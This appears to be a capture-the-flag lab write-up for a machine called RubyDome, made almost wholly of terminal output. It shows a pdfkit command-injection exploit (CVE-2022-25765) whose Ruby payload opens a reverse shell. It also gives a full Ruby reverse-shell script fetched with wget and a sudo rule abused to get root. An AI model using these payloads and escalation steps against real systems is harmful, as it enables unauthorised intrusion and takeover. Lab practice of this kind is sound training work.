RubyDome

Nmap scan report for 192.168.248.22
Host is up (0.23s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
3000/tcp open  http    WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
|_http-title: RubyDome HTML to PDF
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

https://www.exploit-db.com/exploits/51293

┌──(kali㉿kali)-[~/ctf/pg/rubydome]
└─$ python3 pdf.py -w "http://192.168.248.22:3000/pdf" -p url -s 192.168.45.244 80

        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
UNICORD: Exploit for CVE-2022–25765 (pdfkit) - Command Injection
OPTIONS: Reverse Shell Sent to Target Website Mode
PAYLOAD: http://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("192.168.45.244","80"))'`
LOCALIP: 192.168.45.244:80
WARNING: Be sure to start a local listener on the above IP and port. "nc -lnvp 80".
WEBSITE: http://192.168.248.22:3000/pdf
POSTARG: url
EXPLOIT: Payload sent to website!
SUCCESS: Exploit performed action.

┌──(kali㉿kali)-[~/ctf/pg/rubydome/PDFkit-CMD-Injection-CVE-2022-25765]
└─$ nc -lnvp 80
listening on [any] 80 ...
connect to [192.168.45.244] from (UNKNOWN) [192.168.248.22] 35750

ls
app.rb
page.pdf
id
uid=1001(andrew) gid=1001(andrew) groups=1001(andrew),27(sudo)
bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
andrew@rubydome:~/app$

andrew@rubydome:~/app$ sudo -l
sudo -l
Matching Defaults entries for andrew on rubydome:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User andrew may run the following commands on rubydome:
    (ALL) NOPASSWD: /usr/bin/ruby /home/andrew/app/app.rb
andrew@rubydome:~/app$ ls -la /home/andrew/app/app.rb
ls -la /home/andrew/app/app.rb
-rwxrwx--- 1 andrew andrew 1032 Apr 24  2023 /home/andrew/app/app.rb

andrew@rubydome:~/app$ ls -la /home/andrew/app/app.rb
ls -la /home/andrew/app/app.rb
-rwxrwx--- 1 andrew andrew 1032 Apr 24  2023 /home/andrew/app/app.rb
andrew@rubydome:~/app$ cat /home/andrew/app/app.rb
cat /home/andrew/app/app.rb
require 'pdfkit'
require 'sinatra'
set :bind, '0.0.0.0'
set :port, 3000
get '/' do
  <<-HTML
  <html>
    <head>
      <title>RubyDome HTML to PDF</title>
      <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
    </head>
    <body>
      <div class="container">
        <div class="row">
          <div class="col-md-6 col-md-offset-3">
            <h1>RubyDome HTML to PDF</h1>
            <form action="/pdf" method="post">
              <div class="form-group">
                <label for="url">Enter the URL of the HTML page:</label>
                <input type="url" name="url" id="url" class="form-control" required>
              </div>
              <button type="submit" class="btn btn-primary">Convert to PDF</button>
            </form>
          </div>
        </div>
      </div>
    </body>
  </html>
  HTML
end

post '/pdf' do
  url = params['url']
  kit = PDFKit.new(url)
  kit.to_file('page.pdf')
  send_file('page.pdf')
end
andrew@rubydome:~/app$

┌──(kali㉿kali)-[~/ctf/pg/rubydome]
└─$ cat rev.rb                    
#!/usr/bin/env ruby

require 'socket'
require 'open3'

#Set the Remote Host IP
RHOST = "192.168.45.244" 
#Set the Remote Host Port
PORT = "80"

#Tries to connect every 20 sec until it connects.
begin
sock = TCPSocket.new "#{RHOST}", "#{PORT}"
sock.puts "We are connected!"
rescue
  sleep 20
  retry
end

#Runs the commands you type and sends you back the stdout and stderr.
begin
  while line = sock.gets
    Open3.popen2e("#{line}") do | stdin, stdout_and_stderr |
              IO.copy_stream(stdout_and_stderr, sock)
              end  
  end
rescue
  retry
end

andrew@rubydome:~/app$ wget http://192.168.45.244:80/rev.rb 
wget http://192.168.45.244:80/rev.rb 
--2025-05-17 18:45:30--  http://192.168.45.244/rev.rb
Connecting to 192.168.45.244:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 566 [application/x-ruby]
Saving to: ‘rev.rb’

rev.rb              100%[===================>]     566  --.-KB/s    in 0s      

2025-05-17 18:45:30 (127 MB/s) - ‘rev.rb’ saved [566/566]

andrew@rubydome:~/app$ ls -la
ls -la
total 24
drwxr-xr-x 2 andrew andrew 4096 May 17 18:45 .
drwxr-x--- 3 andrew andrew 4096 Jun 13  2023 ..
-rwxrwx--- 1 andrew andrew 1032 Apr 24  2023 app.rb
-rw-rw-r-- 1 andrew andrew 7431 May 17 18:38 page.pdf
-rw-rw-r-- 1 andrew andrew  566 May 17 18:44 rev.rb
andrew@rubydome:~/app$ mv app.rb app.rb.ak
mv app.rb app.rb.ak
andrew@rubydome:~/app$ mv rev.rb app.rb
mv rev.rb app.rb
andrew@rubydome:~/app$ sudo /usr/bin/ruby /home/andrew/app/app.rb
sudo /usr/bin/ruby /home/andrew/app/app.rb

┌──(kali㉿kali)-[~/ctf/pg/rubydome]
└─$ nc -lnvp 80
listening on [any] 80 ...
connect to [192.168.45.244] from (UNKNOWN) [192.168.248.22] 55066
We are connected!
id
uid=0(root) gid=0(root) groups=0(root)
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@rubydome:/home/andrew/app#

PreviousFlu NextAstronaut

Last updated 7 months ago